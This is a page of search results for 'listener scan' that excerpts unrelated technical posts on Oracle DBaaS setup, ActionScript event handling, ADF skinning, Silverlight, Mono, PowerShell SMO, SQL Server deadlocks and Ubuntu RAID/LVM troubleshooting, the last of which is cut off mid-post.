Search Results

Search found 3181 results on 128 pages for 'listener scan'.

Page 104/128 | < Previous Page | 100 101 102 103 104 105 106 107 108 109 110 111  | Next Page >

  • Database-as-a-Service on Exadata Cloud

    - by Gagan Chawla
    Note – Oracle Enterprise Manager 12c DBaaS is platform agnostic and is designed to work on Exadata/non-Exadata, physical/virtual, Oracle/non Oracle platforms and it’s not a mandatory requirement to use Exadata as the base platform. Database-as-a-Service (DBaaS) is an important trend these days and the top business drivers motivating customers towards private database cloud model include constant pressure to reduce IT Costs and Complexity, and also to be able to improve Agility and Quality of Service. The first step many enterprises take in their journey towards cloud computing is to move to a consolidated and standardized environment and Exadata being already a proven best-in-class popular consolidation platform, we are seeing now more and more customers starting to evolve from Exadata based platform into an agile self service driven private database cloud using Oracle Enterprise Manager 12c. Together Exadata Database Machine and Enterprise Manager 12c provides industry’s most comprehensive and integrated solution to transform from a typical silo’ed environment into enterprise class database cloud with self service, rapid elasticity and pay-per-use capabilities.   In today’s post, I’ll list down the important steps to enable DBaaS on Exadata using Enterprise Manager 12c. These steps are chalked down based on a recent DBaaS implementation from a real customer engagement - Project Planning - First step involves defining the scope of implementation, mapping functional requirements and objectives to use cases, defining high availability, network, security requirements, and delivering the project plan. In a Cloud project you plan around technology, business and processes all together so ensure you engage your actual end users and stakeholders early on in the project right from the scoping and planning stage. Setup your EM 12c Cloud Control Site – Once the project plan approval and sign off from stakeholders is achieved, refer to EM 12c Install guide and these are some important tips to follow during the site setup phase - Review the new EM 12c Sizing paper before you get started with install Cloud, Chargeback and Trending, Exadata plug ins should be selected to deploy during install Refer to EM 12c Administrator’s guide for High Availability, Security, Network/Firewall best practices and options Your management and managed infrastructure should not be combined i.e. EM 12c repository should not be hosted on same Exadata where target Database Cloud is to be setup Setup Roles and Users – Cloud Administrator (EM_CLOUD_ADMINISTRATOR), Self Service Administrator (EM_SSA_ADMINISTRATOR), Self Service User (EM_SSA_USER) are the important roles required for cloud lifecycle management. Roles and users are managed by Super Administrator via Setup menu –> Security option. For Self Service/SSA users custom role(s) based on EM_SSA_USER should be created and EM_USER, PUBLIC roles should be revoked during SSA user account creation. Configure Software Library – Cloud Administrator logs in and in this step configures software library via Enterprise menu –> provisioning and patching option and the storage location is OMS shared filesystem. Software Library is the centralized repository that stores all software entities and is often termed as ‘local store’. Setup Self Update – Self Update is one of the most innovative and cool new features in EM 12c framework. Self update can be accessed via Setup -> Extensibility option by Super Administrator and is the unified delivery mechanism to get all new and updated entities (Agent software, plug ins, connectors, gold images, provisioning bundles etc) in EM 12c. Deploy Agents on all Compute nodes, and discover Exadata targets – Refer to Exadata discovery cookbook for detailed walkthrough to ensure successful discovery of Exadata targets. Configure Privilege Delegation Settings – This step involves deployment of privilege setting template on all the nodes by Super Administrator via Setup menu -> Security option with the option to define whether to use sudo or powerbroker for all provisioning and patching operations. Provision Grid Infrastructure with RAC Database on Compute Nodes – Software is provisioned in this step via a provisioning profile using EM 12c database provisioning. In case of Exadata, Grid Infrastructure and RAC Database software is already deployed on compute nodes via OneCommand from Oracle, so SSA Administrator just needs to discover Oracle Homes and Listener as EM targets. Databases will be created as and when users request for databases from cloud. Customize Create Database Deployment Procedure – the actual database creation steps are "templatized" in this step by Self Service Administrator and the newly saved deployment procedure will be used during service template creation in next step. This is an important step and make sure you have locked all the required variables marked as locked as ‘Y’ in this table. Setup Self Service Portal – This step involves setting up of zones, user quotas, service templates, chargeback plan. The SSA portal is setup by Self Service Administrator via Setup menu -> Cloud -> Database option and following guided workflow. Refer to DBaaS cookbook for details. You also have an option to customize SSA login page via steps documented in EM 12c Cloud Administrator’s guide Final Checks – Define and document process guidelines for SSA users and administrators. Get your SSA users trained on Self Service Portal features and overall DBaaS model and SSA administrators should be familiar with Self Service Portal setup pieces, EM 12c database lifecycle management capabilities and overall EM 12c monitoring framework. GO LIVE – Announce rollout of Database-as-a-Service to your SSA users. Users can login to the Self Service Portal and request/monitor/view their databases in Exadata based database cloud. Congratulations! You just delivered a successful database cloud implementation project! In future posts, we will cover these additional useful topics around database cloud – DBaaS Implementation tips and tricks – right from setup to self service to managing the cloud lifecycle ‘How to’ enable real production databases copies in DBaaS with rapid provisioning in database cloud Case study of a customer who recently achieved success with their transformational journey from traditional silo’ed environment on to Exadata based database cloud using Enterprise Manager 12c. More Information – Podcast on Database as a Service using Oracle Enterprise Manager 12c Oracle Enterprise Manager 12c Installation and Administration guide, Cloud Administration guide DBaaS Cookbook Exadata Discovery Cookbook Screenwatch: Private Database Cloud: Set Up the Cloud Self-Service Portal Screenwatch: Private Database Cloud: Use the Cloud Self-Service Portal Stay Connected: Twitter |  Face book |  You Tube |  Linked in |  Newsletter

    Read the article

  • Using Event Driven Programming in games, when is it beneficial?

    - by Arthur Wulf White
    I am learning ActionScript 3 and I see the Event flow adheres to the W3C recommendations. From what I learned events can only be captured by the dispatcher unless, the listener capturing the event is a DisplayObject on stage and a parent of the object firing the event. You can capture the events in the capture(before) or bubbling(after) phase depending on Listner and Event setup you use. Does this system lend itself well for game programming? When is this system useful? Could you give an example of a case where using events is a lot better than going without them? Are they somehow better for performance in games? Please do not mention events you must use to get a game running, like Event.ENTER_FRAME Or events that are required to get input from the user like, KeyboardEvent.KEY_DOWN and MouseEvent.CLICK. I am asking if there is any use in firing events that have nothing to do with user input, frame rendering and the likes(that are necessary). I am referring to cases where objects are communicating. Is this used to avoid storing a collection of objects that are on the stage? Thanks Here is some code I wrote as an example of event behavior in ActionScript 3, enjoy. package regression { import flash.display.Shape; import flash.display.Sprite; import flash.events.Event; import flash.events.EventDispatcher; import flash.events.KeyboardEvent; import flash.events.MouseEvent; import flash.events.EventPhase; /** * ... * @author ... */ public class Check_event_listening_1 extends Sprite { public const EVENT_DANCE : String = "dance"; public const EVENT_PLAY : String = "play"; public const EVENT_YELL : String = "yell"; private var baby : Shape = new Shape(); private var mom : Sprite = new Sprite(); private var stranger : EventDispatcher = new EventDispatcher(); public function Check_event_listening_1() { if (stage) init(); else addEventListener(Event.ADDED_TO_STAGE, init); } private function init(e:Event = null):void { trace("test begun"); addChild(mom); mom.addChild(baby); stage.addEventListener(EVENT_YELL, onEvent); this.addEventListener(EVENT_YELL, onEvent); mom.addEventListener(EVENT_YELL, onEvent); baby.addEventListener(EVENT_YELL, onEvent); stranger.addEventListener(EVENT_YELL, onEvent); trace("\nTest1 - Stranger yells with no bubbling"); stranger.dispatchEvent(new Event(EVENT_YELL, false)); trace("\nTest2 - Stranger yells with bubbling"); stranger.dispatchEvent(new Event(EVENT_YELL, true)); stage.addEventListener(EVENT_PLAY, onEvent); this.addEventListener(EVENT_PLAY, onEvent); mom.addEventListener(EVENT_PLAY, onEvent); baby.addEventListener(EVENT_PLAY, onEvent); stranger.addEventListener(EVENT_PLAY, onEvent); trace("\nTest3 - baby plays with no bubbling"); baby.dispatchEvent(new Event(EVENT_PLAY, false)); trace("\nTest4 - baby plays with bubbling"); baby.dispatchEvent(new Event(EVENT_PLAY, true)); trace("\nTest5 - baby plays with bubbling but is not a child of mom"); mom.removeChild(baby); baby.dispatchEvent(new Event(EVENT_PLAY, true)); mom.addChild(baby); stage.addEventListener(EVENT_DANCE, onEvent, true); this.addEventListener(EVENT_DANCE, onEvent, true); mom.addEventListener(EVENT_DANCE, onEvent, true); baby.addEventListener(EVENT_DANCE, onEvent); trace("\nTest6 - Mom dances without bubbling - everyone is listening during capture phase(not target and bubble phase)"); mom.dispatchEvent(new Event(EVENT_DANCE, false)); trace("\nTest7 - Mom dances with bubbling - everyone is listening during capture phase(not target and bubble phase)"); mom.dispatchEvent(new Event(EVENT_DANCE, true)); } private function onEvent(e : Event):void { trace("Event was captured"); trace("\nTYPE : ", e.type, "\nTARGET : ", objToName(e.target), "\nCURRENT TARGET : ", objToName(e.currentTarget), "\nPHASE : ", phaseToString(e.eventPhase)); } private function phaseToString(phase : int):String { switch(phase) { case EventPhase.AT_TARGET : return "TARGET"; case EventPhase.BUBBLING_PHASE : return "BUBBLING"; case EventPhase.CAPTURING_PHASE : return "CAPTURE"; default: return "UNKNOWN"; } } private function objToName(obj : Object):String { if (obj == stage) return "STAGE"; else if (obj == this) return "MAIN"; else if (obj == mom) return "Mom"; else if (obj == baby) return "Baby"; else if (obj == stranger) return "Stranger"; else return "Unknown" } } } /*result : test begun Test1 - Stranger yells with no bubbling Event was captured TYPE : yell TARGET : Stranger CURRENT TARGET : Stranger PHASE : TARGET Test2 - Stranger yells with bubbling Event was captured TYPE : yell TARGET : Stranger CURRENT TARGET : Stranger PHASE : TARGET Test3 - baby plays with no bubbling Event was captured TYPE : play TARGET : Baby CURRENT TARGET : Baby PHASE : TARGET Test4 - baby plays with bubbling Event was captured TYPE : play TARGET : Baby CURRENT TARGET : Baby PHASE : TARGET Event was captured TYPE : play TARGET : Baby CURRENT TARGET : Mom PHASE : BUBBLING Event was captured TYPE : play TARGET : Baby CURRENT TARGET : MAIN PHASE : BUBBLING Event was captured TYPE : play TARGET : Baby CURRENT TARGET : STAGE PHASE : BUBBLING Test5 - baby plays with bubbling but is not a child of mom Event was captured TYPE : play TARGET : Baby CURRENT TARGET : Baby PHASE : TARGET Test6 - Mom dances without bubbling - everyone is listening during capture phase(not target and bubble phase) Event was captured TYPE : dance TARGET : Mom CURRENT TARGET : STAGE PHASE : CAPTURE Event was captured TYPE : dance TARGET : Mom CURRENT TARGET : MAIN PHASE : CAPTURE Test7 - Mom dances with bubbling - everyone is listening during capture phase(not target and bubble phase) Event was captured TYPE : dance TARGET : Mom CURRENT TARGET : STAGE PHASE : CAPTURE Event was captured TYPE : dance TARGET : Mom CURRENT TARGET : MAIN PHASE : CAPTURE */

    Read the article

  • How-to hide the close icon for task flows opened in dialogs

    - by frank.nimphius
    Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} ADF bounded task flows can be opened in an external dialog and return values to the calling application as documented in chapter 19 of Oracle Fusion Middleware Fusion Developer's Guide for Oracle Application Development Framework11g: http://download.oracle.com/docs/cd/E15523_01/web.1111/b31974/taskflows_dialogs.htm#BABBAFJB Setting the task flow call activity property Run as Dialog to true and the Display Type property to inline-popup opens the bounded task flow in an inline popup. To launch the dialog, a command item is used that references the control flow case to the task flow call activity <af:commandButton text="Lookup" id="cb6"         windowEmbedStyle="inlineDocument" useWindow="true"         windowHeight="300" windowWidth="300"         action="lookup" partialSubmit="true"/> By default, the dialog that contains the task flow has a close icon defined that if pressed closes the dialog and returns to the calling page. However, no event is sent to the calling page to handle the close case. To avoid users closing the dialog without the calling application to be notified in a return listener, the close icon shown in the opened dialog can be hidden using ADF Faces skinning. Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} The following skin selector hides the close icon in the dialog af|panelWindow::close-icon-style{ display:none; } To learn about skinning, see chapter 20 of Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework http://download.oracle.com/docs/cd/E15523_01/web.1111/b31973/af_skin.htm#BAJFEFCJ However, the skin selector that is shown above hides the close icon from all af:panelWindow usages, which may not be intended. To only hide the close icon from dialogs opened by a bounded task flow call activity, the ADF Faces component styleClass property can be used. The af:panelWindow component shown below has a "withCloseWindow" style class property name defined. This name is referenced in the following skin selector, ensuring that the close icon is displayed af|panelWindow.withCloseIcon::close-icon-style{ display:block; } In summary, to hide the close icon shown for bounded task flows that are launched in inline popup dialogs, the default display behavior of the close icon of the af:panelWindow needs to be reversed. Instead to always display the close icon, the close icon is always hidden, using the first skin selector. To show the disclosed icon in other usages of the af:panelWindow component, the component is flagged with a styleClass property value as shown below <af:popup id="p1">   <af:panelWindow id="pw1" contentWidth="300" contentHeight="300"                                 styleClass="withCloseIcon"/> </af:popup> The "withCloseIcon" value is referenced in the second skin definition af|panelWindow.withCloseIcon::close-icon-style{ display:block; } The complete entry of the skin CSS file looks as shown below: af|panelWindow::close-icon-style{ display:none; } af|panelWindow.withCloseIcon::close-icon-style{ display:block; }

    Read the article

  • Building on someone else's DefaultButton Silverlight work...

    - by KyleBurns
    This week I was handed a "simple" requirement - have a search screen execute its search when the user pressed the Enter key instead of having to move hands from keyboard to mouse and click Search.  That is a reasonable request that has been met for years both in Windows and Web apps.  I did a quick scan for code to pilfer and found Patrick Cauldwell's Blog posting "A 'Default Button' In Silverlight".  This posting was a great start and I'm glad that the basic work had been done for me, but I ran into one issue - when using bound textboxes (I'm a die-hard MVVM enthusiast when it comes to Silverlight development), the search was being executed before the textbox I was in when the Enter key was pressed updated its bindings.  With a little bit of reflection work, I think I have found a good generic solution that builds upon Patrick's to make it more binding-friendly.  Also, I wanted to set the DefaultButton at a higher level than on each TextBox (or other control for that matter), so the use of mine is intended to be set somewhere such as the LayoutRoot or other high level control and will apply to all controls beneath it in the control tree.  I haven't tested this on controls that treat the Enter key special themselves in the mix. The real change from Patrick's solution here is that in the KeyUp event, I grab the source of the KeyUp event (in my case the textbox containing search criteria) and loop through the static fields on the element's type looking for DependencyProperty instances.  When I find a DependencyProperty, I grab the value and query for bindings.  Each time I find a binding, UpdateSource is called to make sure anything bound to any property of the field has the opportunity to update before the action represented by the DefaultButton is executed. Here's the code: public class DefaultButtonService { public static DependencyProperty DefaultButtonProperty = DependencyProperty.RegisterAttached("DefaultButton", typeof (Button), typeof (DefaultButtonService), new PropertyMetadata (null, DefaultButtonChanged)); private static void DefaultButtonChanged(DependencyObject d, DependencyPropertyChangedEventArgs e) { var uiElement = d as UIElement; var button = e.NewValue as Button; if (uiElement != null && button != null) { uiElement.KeyUp += (sender, arg) => { if (arg.Key == Key.Enter) { var element = arg.OriginalSource as FrameworkElement; if (element != null) { UpdateBindings(element); } if (button.IsEnabled) { button.Focus(); var peer = new ButtonAutomationPeer(button); var invokeProv = peer.GetPattern(PatternInterface.Invoke) as IInvokeProvider; if (invokeProv != null) invokeProv.Invoke(); arg.Handled = true; } } }; } } public static DefaultButtonService GetDefaultButton(UIElement obj) { return (DefaultButtonService) obj.GetValue(DefaultButtonProperty); } public static void SetDefaultButton(DependencyObject obj, DefaultButtonService button) { obj.SetValue(DefaultButtonProperty, button); } public static void UpdateBindings(FrameworkElement element) { element.GetType().GetFields(BindingFlags.Public | BindingFlags.Static).ForEach(field => { if (field.FieldType.IsAssignableFrom(typeof(DependencyProperty))) { try { var dp = field.GetValue(null) as DependencyProperty; if (dp != null) { var binding = element.GetBindingExpression(dp); if (binding != null) { binding.UpdateSource(); } } } // ReSharper disable EmptyGeneralCatchClause catch (Exception) // ReSharper restore EmptyGeneralCatchClause { // swallow exceptions } } }); } }

    Read the article

  • October in Review

    - by Richard Bingham
    With OpenWorld over October was time to get back to serious work for everyone, including the Fusion Applications Developer Relations team. Don't forget the OpenWorld content is still available, including presentation downloads, for a limited period of time so be sure to grab anything you found useful or take another scan for anything you might have missed. Of all the announcements, the continued evolution of the Oracle Cloud services for extending and integrating with Fusion Applications is increasing in popularity, and certainly the Cloud Marketplace is something we're becoming involved in. More details to follow. Fusion Concepts Last week Vik from our team started the new "Fusion Concepts" series of articles, providing those new to Fusion Applications an explanation of the architectural basics, with the aim to reduce the learning curve and lay the platform for more efficient and effective development. The series begun with an insightful first post on the different schemas that exist in the Fusion Applications database. Look out for upcoming posts on multi-lingual entities, profile options, look-ups and more. New Learning Resources Our YouTube channel continued to expand with more 'how to' videos on using page composer, extending the Simplified UI (aka FUSE), and integrating BI reports and analytics. Also the Oracle Learning Library is now well established as a central resource for knowledge, now with thousands of tutorials, videos, and documents. Of particular note are the great new extensibility-related videos added by the CRM Product Management team, including more on the ever-expanding capabilities of Application Composer. To see some examples of these search using keyword 'customization' or the product 'Sales Cloud'. Finally on learning resources, as Oliver mentioned the Oracle Press book on Fusion Application Customization and Extensibility is now available for pre-order on Amazon (due out 1st Jan). Out And About October also saw us attend the annual Apps Conference held by the UK Oracle User Group in London. Interestingly there was an Applications Transformation stream of sessions and content that included Fusion Applications with all the latest in the Oracle Applications evolution, as always focused around the three tenets of social, mobile, and cloud. Read more in Richard's post-event write up. Other teams around Oracle have also been busy. Angelo from the Platform Technical Services group has done quite a bit of work using web services with Fusion SaaS and has published many interesting findings on his blog. It's definitely recommended reading if you are working on any related integration projects. The middleware-for-applications group has built a new tool called "AppAdvantage" offering an online assessment of your use of Fusion Middleware technologies with Oracle Applications. As the popularity of integrating cloud applications with on-premises systems continued to grow, leveraging existing middleware technologies (and licenses) to support the integration solution is likely to be of paramount importance. Similarly the "Build Enterprise Application Extensions with Ease" section of the related webpage has AppsUX director Killan Evers speaking about customization using the composer tools. Both are useful resources for those just getting started with a move to Fusion Applications. The Oracle A-Team, specialists in middleware technical architecture, always publish superb content via their 'chronicles' site, now with a substantial amount specifically related to Fusion Applications. Click on the Fusion Applications menu on the top right of their homepage to see more. Last month of particular note was an article on customizing the timeout pop-up message that shows to inactive users, providing design-time insight and easy-to-follow steps. Finally if you're looking at using Oracle Middleware and Cloud to tailor and extend your applications then you may also be interested in this new blog post on the roadmap for Oracle SOA and the latest on-demand Cloud Development webcast.

    Read the article

  • Stepping outside Visual Studio IDE [Part 2 of 2] with Mono 2.6.4

    - by mbcrump
    Continuing part 2 of my Stepping outside the Visual Studio IDE, is the open-source Mono Project. Mono is a software platform designed to allow developers to easily create cross platform applications. Sponsored by Novell (http://www.novell.com/), Mono is an open source implementation of Microsoft's .NET Framework based on the ECMA standards for C# and the Common Language Runtime. A growing family of solutions and an active and enthusiastic contributing community is helping position Mono to become the leading choice for development of Linux applications. So, to clarify. You can use Mono to develop .NET applications that will run on Linux, Windows or Mac. It’s basically a IDE that has roots in Linux. Let’s first look at the compatibility: Compatibility If you already have an application written in .Net, you can scan your application with the Mono Migration Analyzer (MoMA) to determine if your application uses anything not supported by Mono. The current release version of Mono is 2.6. (Released December 2009) The easiest way to describe what Mono currently supports is: Everything in .NET 3.5 except WPF and WF, limited WCF. Here is a slightly more detailed view, by .NET framework version: Implemented C# 3.0 System.Core LINQ ASP.Net 3.5 ASP.Net MVC C# 2.0 (generics) Core Libraries 2.0: mscorlib, System, System.Xml ASP.Net 2.0 - except WebParts ADO.Net 2.0 Winforms/System.Drawing 2.0 - does not support right-to-left C# 1.0 Core Libraries 1.1: mscorlib, System, System.Xml ASP.Net 1.1 ADO.Net 1.1 Winforms/System.Drawing 1.1 Partially Implemented LINQ to SQL - Mostly done, but a few features missing WCF - silverlight 2.0 subset completed Not Implemented WPF - no plans to implement WF - Will implement WF 4 instead on future versions of Mono. System.Management - does not map to Linux System.EnterpriseServices - deprecated Links to documentation. The Official Mono FAQ’s Links to binaries. Mono IDE Latest Version is 2.6.4 That's it, nothing more is required except to compile and run .net code in Linux. Installation After landing on the mono project home page, you can select which platform you want to download. I typically pick the Virtual PC image since I spend all of my day using Windows 7. Go ahead and pick whatever version is best for you. The Virtual PC image comes with Suse Linux. Once the image is launch, you will see the following: I’m not going to go through each option but its best to start with “Start Here” icon. It will provide you with information on new projects or existing VS projects. After you get Mono installed, it's probably a good idea to run a quick Hello World program to make sure everything is setup properly. This allows you to know that your Mono is working before you try writing or running a more complex application. To write a "Hello World" program follow these steps: Start Mono Development Environment. Create a new Project: File->New->Solution Select "Console Project" in the category list. Enter a project name into the Project name field, for example, "HW Project". Click "Forward" Click “Packaging” then OK. You should have a screen very simular to a VS Console App. Click the "Run" button in the toolbar (Ctrl-F5). Look in the Application Output and you should have the “Hello World!” Your screen should look like the screen below. That should do it for a simple console app in mono. To test out an ASP.NET application, simply copy your code to a new directory in /srv/www/htdocs, then visit the following URL: http://localhost/directoryname/page.aspx where directoryname is the directory where you deployed your application and page.aspx is the initial page for your software. Databases You can continue to use SQL server database or use MySQL, Postgress, Sybase, Oracle, IBM’s DB2 or SQLite db. Conclusion I hope this brief look at the Mono IDE helps someone get acquainted with development outside of VS. As always, I welcome any suggestions or comments.

    Read the article

  • Reducing Deadlocks - not a DBA issue ?

    - by steveh99999
     As a DBA, I'm involved on an almost daily basis troubleshooting 'SQL Server' performance issues. Often, this troubleshooting soon veers away from a 'its a SQL Server issue' to instead become a wider application/database design/coding issue.One common perception with SQL Server is that deadlocking is an application design issue - and is fixed by recoding...  I see this reinforced by MCP-type questions/scenarios where the answer to prevent deadlocking is simply to change the order in code in which tables are accessed....Whilst this is correct, I do think this has led to a situation where many 'operational' or 'production support' DBAs, when faced with a deadlock, are happy to throw the issue over to developers without analysing the issue further....A couple of 'war stories' on deadlocks which I think are interesting :- Case One , I had an issue recently on a third-party application that I support on SQL 2008.  This particular third-party application has an unusual support agreement where the customer is allowed to change the index design on the third-party provided database.  However, we are not allowed to alter application code or modify table structure..This third-party application is also known to encounter occasional deadlocks – indeed, I have documentation from the vendor that up to 50 deadlocks per day is not unusual !So, as a DBA I have to support an application which in my opinion has too many deadlocks - but, I cannot influence the design of the tables or stored procedures for the application. This should be the classic - blame the third-party developers scenario, and hope this issue gets addressed in a future application release - ie we could wait years for this to be resolved and implemented in our production environment...But, as DBAs  can change the index layout, is there anything I could do still to reduce the deadlocks in the application ?I initially used SQL traceflag 1222 to write deadlock detection output to the SQL Errorlog – using this I was able to identify one table heavily involved in the deadlocks.When I examined the table definition, I was surprised to see it was a heap – ie no clustered index existed on the table.Using SQL profiler to see locking behaviour and plan for the query involved in the deadlock, I was able to confirm a table scan was being performed.By creating an appropriate clustered index - it was possible to produce a more efficient plan and locking behaviour.So, less locks, held for less time = less possibility of deadlocks. I'm still unhappy about the overall number of deadlocks on this system - but that's something to be discussed further with the vendor.Case Two,  a system which hadn't changed for months suddenly started seeing deadlocks on a regular basis. I love the 'nothing's changed' scenario, as it gives me the opportunity to appear wise and say 'nothings changed on this system, except the data'.. This particular deadlock occurred on a table which had been growing rapidly. By using DBCC SHOW_STATISTICS - the DBA team were able to see that the deadlocks seemed to be occurring shortly after auto-update stats had regenerated the table statistics using it's default sampling behaviour.As a quick fix, we were able to schedule a nightly UPDATE STATISTICS WITH FULLSCAN on the table involved in the deadlock - thus, greatly reducing the potential for stats to be updated via auto_update_stats, consequently reducing the potential for a bad plan to be generated based on an unrepresentative sample of the data. This reduced the possibility of a deadlock occurring.  Not a perfect solution by any means, but quick, easy to implement, and needed no application code changes. This fix gave us some 'breathing space'  to properly fix the code during the next scheduled application release.   The moral of this post - don't dismiss deadlocks as issues that can only be fixed by developers...

    Read the article

  • Starting over and new to Ubuntu

    - by 2funnyyone
    We have been having repeated problems with our interent service and using windows xp & sp3 (users and premissions) I see no need for them. I started with computers long before windows. Every since sp 3 come out in 2009 I have had nothing but problems. I have lost so many computers to virius and trojans, we just stack them up. We are with Qwest/ Century link which is using advertising servers which I think is causing the problem. All the computers are networked together which is not how I set them up. I beleive Century link is networking them through assignment of a domain for our home. This causes all the computers to crash twice. This is getting expensive. We tried buying new harddrives but reinfect with hours of connecting to internet. I also beleive the modem, router and all computers are infected. I put combofix on this one and that is the only reason we are still online with this laptop. I am afraid to install new equipment because my partner and I are on SSDI and this cost a lot. I go to school at UOP and had to run off a flash and reboot this laptop to recovery every other day or so, this pass month. New plan is: We are getting ready to install new equipment but afraid to reinfect again. Need help to install new equipment. The plan is to use current internet services from Qwest/ now Century Link. The list of New equipment in order: Century link wireless modem is ZyXEL PK5000Z with 4 direct connect Ethernet ports Next Dell Optiplex 210L ( used auction purchase ) 2 gb ram 80 g hard drive Ubuntu 11.10 operating system Next Wireless D-Link router WBR-1310 with 4 direct connect Ethernet ports OK-------- Purchased Dell OEM disk for Repair or Reinstalling Windows XP Professional Operating system (2 roommates as well) All infected computers are Dell desktops or laptops with XP Pro Also purchasing Ubuntu 12.04 for 3 computers. We like the way it runs but still learning it. Questions 1] How do we fdisk the infected computers without infecting new system. We have Dos disks, but none have floppy dish drive. We do have a new floppy disk drive and usb adapter we purchased from Amazon. 2] We are thinking Avast internet security because of the boot scan. We want all software loaded before reconnecting. We can manually load our internet provider information. We purchased StopZilla $100 for 5 computers, but not sure that is what we need. But need how to setup ports security and services we will need. Really lost at this part. So we are safe when we go back on the internet. 3] Want to connect reloaded fdisk systems to router as public connection and no sharing. Do not want to network all computers. 4] Want parental/ ownership control from Ubuntu system for internet connection (Children and friends). Do we restrict at the modem and/ or router? Any help would be a blessing. I do not want to go alone on this anymore.

    Read the article

  • PowerShell and SMO – be careful how you iterate

    - by Fatherjack
    I’ve yet to have a totally smooth experience with PowerShell and it was late on Friday when I crashed into this problem. I haven’t investigated if this is a generally well understood circumstance and if it is then I apologise for repeating everything. Scenario: I wanted to scan a number of server for many properties, including existing logins and to identify which accounts are bestowed with sysadmin privileges. A great task to pass to PowerShell, so with a heavy heart I started up PowerShellISE and started typing. The script doesn’t come easily to me but I follow the logic of SMO and the properties and methods available with the language so it seemed something I should be able to master. Version #1 of my script. And the results it returns when executed against my home laptop server. These results looked good and for a long time I was concerned with other parts of the script, for all intents and purposes quite happy that this was an accurate assessment of the server. Let’s just review my logic for each step of the code at the top. Lines 1 to 7 just set up our variables and write out the header message Line 8 our first loop, to go through each login on the server Line 10 an inner loop that will assess each role name that each login has been assigned Line 11 a test to see if each role has the name ‘sysadmin’ Line 13 write out the login name with a bright format as it is a sysadmin login Line 17 write out the login name with no formatting It is quite possible that here someone with more PowerShell experience than me will be shouting at their screen pointing at the error I made but to me this made total sense. Until I altered the code, I altered lines 6 and 7 of code above to be: $c = $Svr.Logins.Count write-host “There are $c Logins on the server” This changed my output to look like this: This started alarm bells ringing – there are clearly not 13 logins listed So, let’s see where things are going wrong, edit the script so it looks like this. I’ve highlighted the changes to make Running this code shows me these results Our $n variable should count up by one for each login returned and We are clearly missing some logins. I referenced this list back to Management Studio for my server and see the Logins as below, where there are clearly 13 logins. We see a Login called Annette in SSMS but not in the script results so I opened that up and looked at its properties and it’s server roles in particular. The account has only public access to the server. Inspection of the other logins that the PowerShell script misses out show they too are only members of the public role. Right now I can’t work out whether there is a good reason for this and if it should be expected behaviour or not. Please spend a few minutes to leave a comment if you have an opinion or theory for this. How to get the full list of logins. Clearly I needed to get a full list of the logins so set about reviewing my code to see if there was a better way to iterate through the roles for each login. This is the code that I came up with and I think it is doing everything that I need it to. It gives me the expected results like this: So it seems that the ListMembers() method is the trouble maker in my first versions of the code. I would have expected that ListMembers should return Logins that are only members of the public role, certainly Technet makes no reference to it being left out in it’s Login.ListMembers details. Suffice to say, it’s a lesson learned and I will approach using it with caution in future circumstances.

    Read the article

  • lvm disappeared after disc replacement on raid10

    - by user142295
    here my problem: I am running ubuntu 12.04 on a raid10 (4 disks), on top of which I installed an lvm with two volume groups (one for /, one for /home). The layout of the disks are as follows: Disk /dev/sda: 1500.3 GB, 1500301910016 bytes 255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x0003f3b6 Device Boot Start End Blocks Id System /dev/sda1 * 63 481949 240943+ 83 Linux /dev/sda2 481950 2910640634 1455079342+ fd Linux raid autodetect /dev/sda3 2910640635 2930272064 9815715 82 Linux swap / Solaris Disk /dev/sdb: 1500.3 GB, 1500301910016 bytes 255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x00069785 Device Boot Start End Blocks Id System /dev/sdb1 63 2910158684 1455079311 fd Linux raid autodetect /dev/sdb2 2910158685 2930272064 10056690 82 Linux swap / Solaris Disk /dev/sdc: 1500.3 GB, 1500301910016 bytes 255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x00000000 Device Boot Start End Blocks Id System /dev/sdc1 63 2910158684 1455079311 fd Linux raid autodetect /dev/sdc2 2910158685 2930272064 10056690 82 Linux swap / Solaris Disk /dev/sdd: 1500.3 GB, 1500301910016 bytes 255 heads, 63 sectors/track, 182401 cylinders, total 2930277168 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x000f14de Device Boot Start End Blocks Id System /dev/sdd1 63 2910158684 1455079311 fd Linux raid autodetect /dev/sdd2 2910158685 2930272064 10056690 82 Linux swap / Solaris The first disk (/dev/sda) contains the /boot partition on 